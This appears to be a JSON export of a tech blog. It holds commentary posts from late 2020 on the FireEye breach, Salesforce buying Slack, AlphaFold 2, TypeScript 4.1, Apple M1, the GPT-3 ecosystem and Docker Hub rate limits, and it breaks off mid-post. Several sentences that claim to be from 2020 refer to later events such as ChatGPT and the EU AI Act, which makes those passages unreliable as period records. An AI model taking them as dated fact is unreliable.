adversaries. 
Attacks that previously required significant expertise to develop can now be executed by less sophisticated actors who simply run the stolen tooling.\nFor defenders, this means another set of attack patterns to watch for. If you run a SOC (Security Operations Center), you should be ingesting FireEye\u0026rsquo;s published countermeasures immediately. If you\u0026rsquo;re a smaller organization without a SOC, make sure your security vendor or MSSP is aware and updating their detection capabilities.\nThe Attribution Question # FireEye attributes the attack to a nation-state actor, and early indications point toward Russia\u0026rsquo;s SVR (external intelligence service). The sophistication of the attack — FireEye describes novel techniques specifically designed to evade their own security tools and forensic investigations — suggests an adversary with significant resources and patience.\nThis is notable because FireEye is not an easy target. They are literally in the business of detecting and responding to sophisticated intrusions. If a state-sponsored adversary can breach FireEye, the uncomfortable implication is that no organization is immune. The security industry has always known this intellectually, but having it demonstrated so publicly is a sobering reminder.\nThe attack also reportedly involved compromise of FireEye\u0026rsquo;s supply chain — though details are still emerging. If confirmed, this would fit a broader trend of attackers targeting the supply chain rather than the target directly. It\u0026rsquo;s often easier to compromise a trusted vendor or tool than to breach a well-defended target\u0026rsquo;s perimeter.\nPractical Steps for Engineering Teams # Even if you\u0026rsquo;re not directly a FireEye customer, there are practical takeaways:\nIngest the countermeasures: FireEye\u0026rsquo;s published GitHub repository with detection rules is immediately actionable. If you use Snort, YARA, or ClamAV, grab the signatures. 
If you use an EDR solution, check with your vendor about incorporating these detections.\nAudit your known vulnerability exposure: The stolen tools target known CVEs, not zero-days. This means patching remains your single most effective defense. Review your vulnerability management program. Are there known CVEs that have been on the \u0026ldquo;we\u0026rsquo;ll get to it\u0026rdquo; list for months? Now is the time.\nReview supply chain trust: This breach reportedly involved supply chain compromise. Take inventory of the software and services that have privileged access to your infrastructure. Update dependencies, verify integrity of installed software, and ensure your vendor management process includes security assessments.\nAssume breach mentality: If FireEye can be breached, your organization can too. Invest in detection and response capabilities, not just prevention. Make sure you have logging, alerting, and incident response procedures that assume the perimeter has been bypassed.\nMy Take # I\u0026rsquo;ve worked in environments where FireEye was part of our security stack, and I know many teams that rely on their tools and threat intelligence. This breach is uncomfortable precisely because it targets a company that should be among the hardest to breach. But there\u0026rsquo;s a reason the security community has been saying \u0026ldquo;assume breach\u0026rdquo; for years — it\u0026rsquo;s not a platitude, it\u0026rsquo;s an operational reality.\nWhat I respect about FireEye\u0026rsquo;s response is the transparency. Publishing countermeasures immediately, disclosing the scope of what was stolen, and providing actionable detection rules — this is how a security company should handle a breach. The contrast with companies that hide breaches for months or downplay their severity is stark.\nThe broader lesson is one that bears repeating: security is not a product you can buy, it\u0026rsquo;s a practice you maintain. 
No tool, no vendor, no amount of spending makes you impervious. What matters is how quickly you detect intrusions, how effectively you respond, and how honestly you assess your own defenses. FireEye\u0026rsquo;s breach is a reminder that even the experts get caught. The question is always: what happens next?\nI have a feeling this story isn\u0026rsquo;t over. The supply chain angle, in particular, deserves close attention in the coming weeks.\n","date":"10 December 2020","externalUrl":null,"permalink":"/posts/201210-fireeye-breach-red-team-tools/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"FireEye discloses that sophisticated attackers stole their red team tools. The implications for the security industry — and every organization using those tools — are serious.","title":"FireEye Breach — When the Red Team Gets Red-Teamed","type":"posts"},{"content":"Salesforce announced this week that it\u0026rsquo;s acquiring Slack for $27.7 billion. That\u0026rsquo;s a staggering number for a messaging application — roughly the GDP of a small country — and it immediately raises the question: what does a CRM giant want with a chat tool? The answer has more to do with the future of enterprise software platforms than it does with messaging, and developers who rely on Slack as part of their daily workflow should be paying attention.\nThe Platform Play # Slack isn\u0026rsquo;t just a chat application. Over the past few years, it\u0026rsquo;s evolved into a platform — a hub where developers integrate monitoring alerts, CI/CD notifications, incident management, deployment approvals, and countless other workflows. For many development teams, Slack is the closest thing to a unified operations dashboard. PagerDuty alerts land in Slack. GitHub notifications flow into Slack. Deployment pipelines report their status in Slack.\nSalesforce sees this exactly for what it is: a platform with deep hooks into how companies actually work. 
The CRM market is maturing, and Salesforce needs a broader platform play to compete with Microsoft\u0026rsquo;s ecosystem (which has Teams, Azure, GitHub, LinkedIn, and Office all working together). Buying Slack gives Salesforce a collaboration hub they can wire into their entire product suite.\nFor developers, this acquisition matters because Slack\u0026rsquo;s role as an integration platform depends heavily on its API ecosystem and its willingness to play nicely with third-party tools. Under independent Slack, the incentive was clear — more integrations meant more value meant more users. Under Salesforce, the incentives may shift. Will Salesforce prioritize integrations with its own products over third-party tools? Will the Slack API remain as open and developer-friendly?\nThe Microsoft Teams Shadow # It\u0026rsquo;s impossible to discuss this acquisition without acknowledging Microsoft Teams, which has been eating into Slack\u0026rsquo;s market share aggressively, particularly since the pandemic drove remote work adoption through the roof. Microsoft bundles Teams with Office 365 — essentially making it free for any organization already paying for Microsoft\u0026rsquo;s productivity suite. That\u0026rsquo;s a brutal competitive dynamic for a company that charges per user per month.\nSlack\u0026rsquo;s DAU numbers have been growing, but Teams reported 115 million daily active users in October. The bundling strategy is working. For many enterprises, the path of least resistance is to use what\u0026rsquo;s already included in their Microsoft subscription rather than paying separately for Slack.\nSalesforce\u0026rsquo;s deep enterprise relationships might give Slack a distribution channel it needs. Every Salesforce customer — and there are hundreds of thousands of them — could become a Slack customer. 
But the flip side is that Slack\u0026rsquo;s identity as an independent, developer-loved tool starts to erode when it becomes a feature of a CRM platform.\nWhat History Tells Us About Enterprise Acquisitions # I\u0026rsquo;ve watched enough enterprise acquisitions over three decades to recognize the pattern. The acquirer always promises to maintain the acquired product\u0026rsquo;s independence and developer community. And for a year or two, they usually do. Then the integration pressure builds — shared authentication, unified billing, cross-product features — and the acquired product gradually becomes more tightly coupled with the parent\u0026rsquo;s ecosystem.\nGitHub\u0026rsquo;s acquisition by Microsoft in 2018 is the optimistic counterexample. Two years later, GitHub has arguably gotten better — more features, free private repos, GitHub Actions, Codespaces. But Microsoft had strong strategic reasons to keep GitHub independent: they needed developer trust, and heavy-handed integration would have destroyed it.\nSalesforce\u0026rsquo;s calculus is different. Their customers are primarily sales and business teams, not developers. The pressure to integrate Slack deeply with Salesforce\u0026rsquo;s CRM, marketing, and analytics products will be enormous. Keeping the developer experience pristine is unlikely to be the top priority.\nPractical Implications for Development Teams # If your team relies heavily on Slack integrations as part of your development workflow, now is a reasonable time to evaluate your dependency. I\u0026rsquo;m not suggesting everyone should migrate away from Slack tomorrow — that would be premature. But consider:\nIntegration portability: Are your Slack integrations built on abstractions that could target other platforms (Discord, Teams, Mattermost), or are they deeply Slack-specific? 
If you\u0026rsquo;re using Slack\u0026rsquo;s proprietary Block Kit for interactive workflows, you\u0026rsquo;re more locked in than you think.\nSelf-hosted alternatives: Tools like Mattermost and Rocket.Chat offer open-source, self-hosted alternatives with Slack-compatible webhook APIs. For teams with sensitive data or regulatory requirements, the acquisition might accelerate interest in self-hosted options.\nBot and workflow migration: If you\u0026rsquo;ve built custom Slack bots using the Bolt framework, take stock of the complexity. Most Slack bots are simple enough to reimplement for another platform in a day or two. The expensive ones are the interactive workflow bots with persistent state — those warrant more careful planning.\nMy Take # The Salesforce-Slack deal is a symptom of a broader trend: the consolidation of developer tools into larger platform ecosystems. Microsoft has GitHub, Azure, and Teams. Google has GCP and Workspace. Now Salesforce has Slack. The era of best-of-breed independent tools is giving way to integrated platform suites.\nThis isn\u0026rsquo;t inherently bad — integration between tools has real value — but it does mean that developers need to think more carefully about platform lock-in. Every tool you adopt is increasingly a vote for an entire ecosystem. Choose Slack and you\u0026rsquo;re now in Salesforce\u0026rsquo;s orbit. Choose Teams and you\u0026rsquo;re in Microsoft\u0026rsquo;s. Choose nothing and you lose the productivity benefits of integration.\nMy instinct is to build on open standards and abstractions wherever possible. Use webhooks rather than proprietary APIs. Keep your notification and workflow logic in your own infrastructure rather than embedding it in a third-party platform. The specific tools will change — they always do — but well-abstracted integrations survive platform transitions.\nTwenty-seven billion dollars is a lot of money for a chat app. But Salesforce isn\u0026rsquo;t buying a chat app. 
They\u0026rsquo;re buying a position in the collaboration platform war. Developers are collateral in that transaction, not the target audience.\n","date":"3 December 2020","externalUrl":null,"permalink":"/posts/201203-salesforce-acquires-slack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Salesforce’s $27.7 billion acquisition of Slack signals a consolidation wave in enterprise software. Developers should pay attention.","title":"Salesforce Buys Slack — What It Means for Developer Tooling","type":"posts"},{"content":"Every few years, something happens in AI that makes you sit up and pay attention — not the usual incremental benchmark improvement or marketing-inflated demo, but a genuine scientific breakthrough. DeepMind\u0026rsquo;s AlphaFold 2 results at CASP14 (the Critical Assessment of protein Structure Prediction competition) this week might be the most significant AI achievement since the original AlphaGo moment in 2016.\nThe numbers are almost absurd. AlphaFold 2 achieved a median Global Distance Test (GDT) score of 92.4 out of 100 across all target proteins — a score that the CASP organizers describe as competitive with experimental methods like X-ray crystallography. To put this in context: the protein folding problem has been one of biology\u0026rsquo;s grand challenges for fifty years. Computational approaches have been chipping away at it for decades, and in a single leap, DeepMind has essentially solved it.\nWhy Protein Folding Matters # For those of us coming from a software engineering background rather than biology, here\u0026rsquo;s why this matters. Proteins are molecular machines that do essentially everything in living organisms. Their function is determined by their 3D structure, which is determined by the sequence of amino acids that make up the protein. 
Predicting the 3D structure from the amino acid sequence — the \u0026ldquo;folding problem\u0026rdquo; — has been a fundamental open question in biology.\nExperimental methods for determining protein structures (X-ray crystallography, NMR spectroscopy, cryo-EM) are expensive, slow, and don\u0026rsquo;t work for every protein. There are roughly 200 million known proteins, but structures have been experimentally determined for only about 170,000 of them. If you can computationally predict protein structures accurately, you unlock the ability to understand — and potentially design — proteins at a scale that was previously impossible.\nThe implications for drug discovery, enzyme engineering, and fundamental biological research are enormous. Understanding how a protein folds tells you how it works, which tells you how to design molecules that interact with it — which is basically what drug design is.\nThe Technical Architecture # What we know so far about AlphaFold 2 (DeepMind hasn\u0026rsquo;t published the full paper yet) suggests an approach that combines several techniques: attention-based neural network architectures operating on multiple sequence alignments, an iterative refinement process that progressively improves the predicted structure, and end-to-end training that directly optimizes for structural accuracy.\nThe attention mechanism is particularly interesting from an AI perspective. Transformers and attention-based architectures have been dominating NLP over the past two years — GPT-3, BERT, and their variants. AlphaFold 2 demonstrates that these architectural ideas transfer powerfully to domains far removed from text processing. 
The relationships between amino acids in a protein sequence have a structural similarity to the relationships between words in a sentence — there are long-range dependencies, contextual effects, and hierarchical patterns.\nDeepMind also appears to have developed novel techniques for handling the geometric constraints of 3D protein structures. This isn\u0026rsquo;t a trivial thing to get right — predicting coordinates in 3D space that satisfy physical and chemical constraints is a fundamentally different problem from predicting the next word in a sentence.\nWhat This Tells Us About AI Progress # I\u0026rsquo;ve been tracking AI developments closely, and AlphaFold 2 stands out because it follows a pattern we should expect to see more of: taking architectural innovations from one domain (NLP, in this case) and applying them to achieve breakthroughs in completely different domains.\nThis is significant for a few reasons. First, it validates the intuition that attention mechanisms and transformer architectures capture something fundamentally useful about the structure of complex data — not just language. Second, it demonstrates that domain expertise still matters enormously. DeepMind didn\u0026rsquo;t just throw a bigger model at more data. They designed an architecture specifically tailored to the geometry and biology of protein structures.\nThe lesson for those of us working with AI in more mundane applications (and most of our applications are mundane compared to protein folding) is that the most impactful results come from combining powerful general architectures with deep domain knowledge. The next breakthrough in your field probably won\u0026rsquo;t come from a bigger GPT — it\u0026rsquo;ll come from someone who understands both the ML technique and the problem domain deeply enough to see how they connect.\nThe Open Questions # The CASP results are remarkable, but there\u0026rsquo;s nuance worth noting. AlphaFold 2 is not perfect for every category of protein. 
It struggles more with protein complexes (multiple proteins interacting) and with proteins that don\u0026rsquo;t have many known evolutionary relatives (since multiple sequence alignments are a key input). The accuracy, while revolutionary, also isn\u0026rsquo;t quite at the level needed for some drug-design applications where you need sub-angstrom precision.\nMore importantly, predicting structure is not the same as understanding folding. AlphaFold 2 can tell you what a protein looks like when folded, but not necessarily how it gets there or why it folds that way. The biophysics of protein folding remains an active and important research area.\nMy Take # As someone who primarily works in software engineering rather than computational biology, I find AlphaFold 2 inspiring for a different reason than the biology. It\u0026rsquo;s a reminder that AI — despite the hype cycles and inflated expectations — is capable of producing genuine, world-changing scientific results when applied rigorously to well-defined problems.\nThe contrast with much of what passes for \u0026ldquo;AI\u0026rdquo; in the tech industry could not be sharper. While we debate whether GPT-3 can write a decent email, DeepMind just accelerated biological research by potentially decades. The difference? A clearly defined problem with objective success criteria, deep domain expertise, and patient, focused engineering.\nThis is the kind of AI application that makes me optimistic about the field\u0026rsquo;s long-term trajectory, even when I\u0026rsquo;m skeptical about the nearest-term hype. The tools we\u0026rsquo;re building — attention mechanisms, large-scale neural networks, differentiable programming — are genuinely powerful. 
The question is always whether we\u0026rsquo;re pointing them at problems that matter.\n","date":"26 November 2020","externalUrl":null,"permalink":"/posts/201126-alphafold2-protein-folding-breakthrough/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"DeepMind’s AlphaFold 2 achieves near-experimental accuracy in protein structure prediction at CASP14. This is what AI breakthroughs actually look like.","title":"AlphaFold 2 — DeepMind Cracks the Protein Folding Problem","type":"posts"},{"content":"The TypeScript team shipped version 4.1 this week, and this one feels significant. While every TypeScript release brings incremental improvements, 4.1 introduces features that fundamentally expand what you can express in the type system — most notably template literal types, key remapping in mapped types, and recursive conditional types. This continues the steady evolution started with TypeScript 3.8’s private fields. These aren’t just academic niceties; they solve real problems that TypeScript developers have been working around for years.\nTemplate Literal Types # The headline feature is template literal types. Just as JavaScript has template literal strings (`Hello, ${name}`), TypeScript now has template literal types:\ntype EventName = `on${Capitalize\u0026lt;string\u0026gt;}`; // matches \u0026#34;onClick\u0026#34;, \u0026#34;onFocus\u0026#34;, \u0026#34;onAnything\u0026#34;, etc. This sounds simple, but the implications are profound. You can now type string manipulation at the type level. Consider how many APIs are string-based - event names, CSS properties, route patterns, environment variable names, database column mappings. Previously, you either typed these as string (losing all type safety) or manually enumerated every possible value (tedious and error-prone).\nWith template literal types, you can derive string types programmatically. 
If you have a type with keys \u0026quot;name\u0026quot; | \u0026quot;age\u0026quot; | \u0026quot;email\u0026quot;, you can automatically generate \u0026quot;getName\u0026quot; | \u0026quot;getAge\u0026quot; | \u0026quot;getEmail\u0026quot; at the type level. ORMs, API clients, and event systems can now provide precise types for string-based interfaces without maintaining enormous type definition files by hand.\nKey Remapping in Mapped Types # The as clause in mapped types is the kind of feature that makes library authors weep with joy. Previously, mapped types could transform the values of an object type but not the keys. Now you can:\ntype Getters\u0026lt;T\u0026gt; = { [K in keyof T as `get${Capitalize\u0026lt;string \u0026amp; K\u0026gt;}`]: () =\u0026gt; T[K] }; Combined with template literal types, this gives you surgical control over type transformations. If you\u0026rsquo;ve ever built a TypeScript wrapper around a legacy API and struggled to make the types line up with string-manipulated property names, you\u0026rsquo;ll immediately see the value.\nRecursive Conditional Types # TypeScript has had conditional types since version 2.8, but a conditional type couldn\u0026rsquo;t reference itself directly in its own branches. Version 4.1 lifts this restriction, enabling types that unwrap or traverse deeply nested structures:\ntype ElementType\u0026lt;T\u0026gt; = T extends ReadonlyArray\u0026lt;infer U\u0026gt; ? ElementType\u0026lt;U\u0026gt; : T; This was technically possible before through workarounds (usually involving a chain of helper types), but native recursion is cleaner and handles arbitrary depth. It\u0026rsquo;s particularly useful for typing JSON-like structures, deeply nested configuration objects, and tree data structures.\nThe TypeScript team has added depth limits to prevent infinite recursion from crashing the compiler, which is a pragmatic engineering decision. 
You\u0026rsquo;ll hit a wall at extremely deep types, but for real-world use cases, the limits are generous enough.\nThe Trend Line # What strikes me about TypeScript\u0026rsquo;s trajectory is how it keeps finding practical improvements that make the type system more expressive without making the language harder to learn. Template literal types are powerful, but you don\u0026rsquo;t need to understand them to write TypeScript. They\u0026rsquo;re a tool for library authors and advanced users, while everyday consumers of those libraries just see better autocomplete and more helpful error messages.\nI\u0026rsquo;ve been writing TypeScript since version 1.8, and the language today is almost unrecognizable compared to those early days. The type system has evolved from \u0026ldquo;JavaScript with basic type annotations\u0026rdquo; to one of the most sophisticated type systems in mainstream use. Each release makes it harder to argue that dynamic typing is \u0026ldquo;good enough\u0026rdquo; for large codebases. The Node.js ecosystem has been adopting TypeScript at an accelerating pace, and releases like 4.1 reinforce why.\nThe 4.x series in particular has been impressive. Version 4.0 brought variadic tuple types and labeled tuple elements. Now 4.1 adds template literal types and recursive conditionals. The type system is approaching a level where you can encode complex business rules entirely in types - validating not just that something is a string, but that it\u0026rsquo;s a string matching a specific pattern.\nMy Take # I\u0026rsquo;ve worked on projects in both dynamically and statically typed languages, and I\u0026rsquo;ve long believed the debate is more about tradeoffs than absolute superiority. But TypeScript keeps shifting the calculus. With each release, the cost of type safety goes down - you can express more with less boilerplate - while the benefits go up.\nTemplate literal types in particular feel like they close a major gap. 
So much of modern web development is string-manipulation-heavy - routing, event handling, CSS-in-JS, database queries - and those were exactly the areas where TypeScript\u0026rsquo;s type system fell short. Not anymore.\nFor teams evaluating TypeScript adoption, the 4.1 release removes another category of \u0026ldquo;we can\u0026rsquo;t type this properly\u0026rdquo; objections. For teams already using TypeScript, it\u0026rsquo;s worth upgrading just for the improved type inference and the new --noUncheckedIndexedAccess flag, which catches a whole class of \u0026ldquo;possibly undefined\u0026rdquo; bugs that previously slipped through.\nIf you\u0026rsquo;re starting a new Node.js project in 2020 and not at least considering TypeScript, you\u0026rsquo;re leaving significant value on the table. The language evolution happening here is a key differentiator for modern JavaScript development.\n","date":"19 November 2020","externalUrl":null,"permalink":"/posts/201119-typescript-4-1-template-literal-types/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"TypeScript 4.1 ships template literal types, key remapping, and recursive conditional types - pushing the boundaries of what a type system can express.","title":"TypeScript 4.1 - Template Literal Types and the March Toward Type Safety","type":"posts"},{"content":"Two days ago, Apple officially unveiled the M1 — their first custom silicon for the Mac. After months of anticipation since the WWDC announcement in June, we now have concrete hardware: a MacBook Air, a 13-inch MacBook Pro, and a Mac Mini, all running on Apple\u0026rsquo;s own ARM-based chip. The benchmarks circulating online are, frankly, hard to believe. 
But having watched platform transitions before, I know the real story isn\u0026rsquo;t about benchmark numbers — it\u0026rsquo;s about what happens to our development workflows.\nThe Performance Claims # Apple claims the M1 delivers up to 3.5x faster CPU performance and up to 6x faster GPU performance compared to the previous generation, all while consuming significantly less power. The unified memory architecture — where CPU, GPU, and Neural Engine share a single pool of memory — is a genuine architectural departure from what we\u0026rsquo;re used to on x86 machines.\nEarly reports from developers who got their hands on review units suggest these aren\u0026rsquo;t just marketing numbers. Xcode compilation times are reportedly cut in half or better. The fanless MacBook Air apparently handles sustained workloads that would have the Intel version thermal throttling within minutes.\nFor those of us who\u0026rsquo;ve spent years listening to laptop fans spin up during Docker builds, this is noteworthy.\nRosetta 2 and the Transition Period # Apple\u0026rsquo;s translation layer, Rosetta 2, is the bridge that makes this transition viable. It translates x86_64 binaries to ARM on the fly, and by most accounts, it does so with remarkably little performance penalty. Some translated apps reportedly run faster on the M1 than they did natively on Intel Macs.\nBut translation layers have limits. I remember the original Rosetta during the PowerPC-to-Intel transition in 2006. It worked, but there were always edge cases — apps that behaved slightly differently, performance cliffs in specific workloads, plugins that refused to cooperate. We should expect similar rough edges here.\nThe bigger concern for developers is the toolchain. Homebrew doesn\u0026rsquo;t fully support ARM yet. Docker Desktop for Apple Silicon isn\u0026rsquo;t available at launch. 
Many development dependencies — database engines, language runtimes, native extensions — need to be recompiled or may have subtle compatibility issues. If your workflow involves running Linux containers (and whose doesn\u0026rsquo;t these days?), you\u0026rsquo;ll be dealing with architecture mismatches between your ARM host and x86_64 container images.\nWhat This Means for the Broader Ecosystem # The M1 isn\u0026rsquo;t just an Apple story. It\u0026rsquo;s an inflection point for ARM in professional computing. AWS has been pushing their Graviton2 ARM instances for months now, and the price-performance numbers there are compelling. Custom silicon evolution would accelerate across vendors. With Apple validating ARM for high-end laptop workloads, the pressure on the broader industry to take ARM seriously on the desktop just increased dramatically.\nFor those of us building server-side software, this creates an interesting dynamic. If a significant portion of developers start working on ARM machines daily, there\u0026rsquo;s a natural push toward ensuring your server workloads also run well on ARM. The Docker containerization ecosystem matured to handle multi-architecture deployments. Multi-architecture builds become a necessity rather than a nice-to-have. CI/CD pipelines need to test on both architectures.\nI\u0026rsquo;ve been running some workloads on Graviton2 instances for cost savings, and the experience has been mostly smooth for compiled languages like Go and Rust. Interpreted languages and managed runtimes (Python, Node.js, Java) generally don\u0026rsquo;t care about the underlying architecture. The pain points are always native dependencies — C extensions, system libraries, anything that needs to be compiled for the target architecture.\nThe Docker Question # This is the elephant in the room for many developers. Docker has announced they\u0026rsquo;re working on Apple Silicon support, but it\u0026rsquo;s not ready yet. 
For anyone whose daily workflow involves spinning up containers — which in 2020 is most backend developers — this is a significant gap at launch.\nThe technical challenge is real. Docker on macOS already runs Linux in a lightweight VM. On ARM hardware, that VM needs to be an ARM Linux VM, which means your containers run as ARM containers. If your production environment is x86_64 (and it almost certainly is), you\u0026rsquo;ve introduced an architecture mismatch in your development flow. QEMU-based emulation can bridge this gap, but at a performance cost.\nMy recommendation: if you\u0026rsquo;re considering an M1 Mac right now, wait a few months. Let the ecosystem catch up. Multi-architecture support should become standard as platform tooling matures. The hardware isn\u0026rsquo;t going anywhere, and by Q1 2021, we\u0026rsquo;ll have a much clearer picture of which tools have solid ARM support and which are still struggling.\nMy Take # I\u0026rsquo;ve been doing this long enough to have lived through multiple platform transitions — 68k to PowerPC, PowerPC to Intel, 32-bit to 64-bit. They always follow the same pattern: impressive initial hardware, a messy transition period, and then a new normal that\u0026rsquo;s genuinely better than what came before.\nThe M1 looks like it could deliver on the promise of better performance with better battery life, which would be a meaningful quality-of-life improvement for developers. But the transition tax is real. If your livelihood depends on a reliable development environment, being an early adopter of a new CPU architecture is a risky proposition.\nThat said, the trajectory is clear. ARM is coming to mainstream computing, and Apple just accelerated the timeline considerably. Start thinking about multi-architecture support in your build pipelines now. Test your applications on ARM. Make sure your Docker images are multi-arch. 
The developers who prepare for this transition early will have the smoothest ride.\nThe Mac has always been popular among developers. When those developers start filing bugs and submitting patches for ARM compatibility, the entire open-source ecosystem benefits. In that sense, the M1 might be one of the most consequential hardware launches for software development in years — not because of what it does today, but because of what it forces the ecosystem to support tomorrow.\n","date":"12 November 2020","externalUrl":null,"permalink":"/posts/201112-apple-m1-developer-impact/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple just shipped their first ARM-based Mac chips. The M1 looks impressive on paper, but what does this transition actually mean for developers?","title":"Apple M1 — What ARM-Based Macs Mean for Developers","type":"posts"},{"content":"It\u0026rsquo;s been about four months since OpenAI opened the GPT-3 API to beta users, and the initial wave of \u0026ldquo;look what I made GPT-3 do\u0026rdquo; tweets has settled into something more interesting: an actual developer ecosystem. Startups are building products on the API, developers are integrating it into workflows, and the practical limitations are becoming as clear as the possibilities. As someone who\u0026rsquo;s been watching AI tools evolve for years, this feels like an inflection point worth examining.\nFrom Demo to Product # The early GPT-3 demos were impressive but felt like parlour tricks — generating blog posts, writing code snippets, creating mock-ups from text descriptions. They went viral, generated discussion, and then the question became: can you actually build a reliable product on this?\nThe answer, it turns out, is nuanced. Companies like Copy.ai and Viable are building commercial products using GPT-3 for marketing copy generation and customer feedback analysis respectively. 
ChatGPT\u0026rsquo;s launch would later democratize access to these capabilities. Several code-related tools have emerged that use GPT-3 to generate SQL queries from natural language, convert between programming languages, or explain code.\nWhat\u0026rsquo;s consistent across the successful applications is constraint. The tools that work well don\u0026rsquo;t give GPT-3 an open-ended task. They constrain the input format, limit the output domain, and add validation layers. A tool that converts natural language to SQL can verify the output is valid SQL before presenting it. A marketing copy generator can let humans edit and approve before publishing. The AI generates candidates; humans curate.\nThis pattern — AI as a suggestion engine with human oversight — isn\u0026rsquo;t new. It\u0026rsquo;s what autocomplete, spell-check, and recommendation systems have been doing for years. GPT-3 just applies it to a much broader set of tasks with a much more capable model.\nThe Developer Experience Challenge # Working with GPT-3 as a developer is a different experience from working with traditional APIs. With a REST endpoint for a payment processor or a mapping service, the contract is clear: send this input, get that output, handle these error cases. With GPT-3, the \u0026ldquo;contract\u0026rdquo; is a natural language prompt, and the output is probabilistic.\nThis creates several challenges I\u0026rsquo;ve been thinking about:\nPrompt engineering is the new programming: Getting consistent, useful output from GPT-3 requires carefully crafted prompts with examples, constraints, and formatting instructions. In-context learning would eventually evolve this discipline significantly. This is a skill that doesn\u0026rsquo;t map neatly to existing developer expertise. It\u0026rsquo;s part writing, part psychology, part systems thinking. 
We don\u0026rsquo;t have good tools, practices, or even vocabulary for it yet.\nTesting is hard: How do you write automated tests for a system whose output is non-deterministic? Traditional assertions break immediately. You need evaluation metrics that capture \u0026ldquo;good enough\u0026rdquo; rather than \u0026ldquo;exactly equal.\u0026rdquo; This is familiar territory for ML engineers but foreign to most application developers.\nCost management: GPT-3\u0026rsquo;s pricing is based on token usage, which means the cost of an API call depends on the input and output length. This is fundamentally different from most SaaS API pricing. A bug that generates verbose prompts or doesn\u0026rsquo;t limit output tokens can run up significant bills quickly.\nLatency: API response times for GPT-3 can range from a few hundred milliseconds to several seconds depending on the model and output length. For interactive applications, this means rethinking UX patterns — streaming responses, progressive rendering, or background processing with notifications.\nThe Open Questions # Several things about the GPT-3 ecosystem give me pause:\nVendor lock-in: Building on a closed API from a single provider is a significant risk. Regulatory frameworks like the EU AI Act would eventually address some of these vendor risks. OpenAI controls the model, the pricing, and the terms of service. They\u0026rsquo;ve already restricted certain use cases and can change policies at any time. There\u0026rsquo;s no self-hosted option, no alternative provider for the same model. If you build a business on GPT-3, you\u0026rsquo;re dependent on OpenAI\u0026rsquo;s continued goodwill and stability.\nBias and safety: GPT-3 is trained on internet text, which means it can generate biased, offensive, or factually incorrect output. For consumer-facing applications, this requires robust content filtering that effectively becomes a separate engineering challenge. 
OpenAI provides some safety guidelines, but the responsibility ultimately falls on developers building on the API.\nThe moat question: If your product is \u0026ldquo;GPT-3 plus a thin wrapper,\u0026rdquo; what happens when OpenAI (or Google, or Facebook) releases a competing product or when the next model generation makes your prompt engineering obsolete? The startups building on GPT-3 need to establish value beyond the underlying model — whether through data, UX, domain expertise, or integration depth.\nMy Take: Useful Today, Transformative Eventually # I\u0026rsquo;ve been building software for three decades, and I\u0026rsquo;ve seen enough technology cycles to know that the real impact of a new capability usually looks different from what the early demos suggest. GPT-3 isn\u0026rsquo;t going to replace programmers — that prediction comes up with every generation of developer tooling and never materializes. What it will do is gradually automate the tedious parts of knowledge work: drafting boilerplate, summarizing documents, translating between formats, generating initial versions of routine content.\nThe most promising applications I\u0026rsquo;m seeing are internal developer tools. Code documentation generators, log analysis assistants, natural-language-to-query interfaces for internal databases. AI-assisted development tools would eventually mature these patterns significantly. These are contexts where the audience is technical, the tolerance for imperfection is higher, and the cost-benefit calculation clearly favors automation.\nWhat excites me most is the ecosystem experimentation happening right now. Hundreds of developers are figuring out what works and what doesn\u0026rsquo;t with large language models in production. The patterns, tools, and best practices emerging from this period will shape how we integrate AI into software development for years to come.\nFor now, my advice is to experiment actively but build cautiously. 
Use GPT-3 for internal tools, prototypes, and applications where human oversight is built into the workflow. The technology is impressive, but our understanding of how to engineer reliable systems on top of probabilistic models is still in its infancy. We\u0026rsquo;re writing the playbook as we go.\n","date":"5 November 2020","externalUrl":null,"permalink":"/posts/201105-gpt3-developer-ecosystem/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s GPT-3 API is spawning a wave of developer tools and startups. The implications for software development are becoming clearer — and more nuanced — than the initial hype suggested.","title":"GPT-3 at Scale — What the Growing Developer Ecosystem Tells Us About AI's Next Chapter","type":"posts"},{"content":"Starting November 1st, Docker Hub is enforcing rate limits on image pulls. Anonymous users get 100 pulls per six hours, authenticated free users get 200, and paid subscribers get unlimited. If you\u0026rsquo;re reading this and thinking \u0026ldquo;that doesn\u0026rsquo;t affect me,\u0026rdquo; I\u0026rsquo;d encourage you to check your CI/CD pipelines before Monday morning. You might be surprised.\nDocker announced these changes back in August, but based on the conversations I\u0026rsquo;ve been having, a lot of teams are still not prepared. The grace period is over, and the reality of Docker Hub\u0026rsquo;s sustainability model is about to hit.\nThe Scale of the Problem # Docker Hub serves over 1 billion image pulls per day. A significant portion of those pulls come from automated systems — CI/CD pipelines, Kubernetes clusters pulling images on pod startup, development machines running docker-compose up. The vast majority of these pulls are unauthenticated because, until now, there was no reason to authenticate for public images.\nHere\u0026rsquo;s where it gets interesting: the rate limits are based on IP address for anonymous pulls. 
If your CI runners share a NAT gateway (common in cloud environments), all those runners share the same rate limit pool. An organization with 50 CI runners behind one public IP gets the same 100 pulls per six hours as a single developer on their laptop. That\u0026rsquo;s going to hurt.\nI did a quick audit of one of my projects this week: a single build that pulls 8 base images (Node, Python, Redis, PostgreSQL, nginx, and a few utility images). Running that build 15 times — a slow day for an active team — would exhaust the anonymous quota. Add in other projects sharing the same runners, and you can see how quickly this becomes a problem.\nWhat\u0026rsquo;s Actually Changing # Let\u0026rsquo;s be precise about the mechanics:\nAnonymous pulls (no Docker Hub login): 100 pulls per 6 hours per source IP\nAuthenticated free (logged in, free account): 200 pulls per 6 hours per user\nPro/Team (paid): unlimited\nDocker Official Images and Verified Publisher images: subject to the same limits\nPulls from Docker Hub mirrors/caches are NOT counted against the limit\nThe authentication piece is important. Simply logging in to Docker Hub (free account) doubles your quota and shifts rate limiting from IP-based to user-based. That alone solves the shared-IP problem for many teams. If you haven\u0026rsquo;t set up Docker Hub authentication in your CI runners, that\u0026rsquo;s the first thing to do.\n# In your CI pipeline, before any docker pull\necho \u0026#34;$DOCKER_HUB_TOKEN\u0026#34; | docker login --username \u0026#34;$DOCKER_HUB_USER\u0026#34; --password-stdin\nMitigating Strategies # Beyond authentication, there are several approaches to minimize the impact:\nRun a Pull-Through Cache # 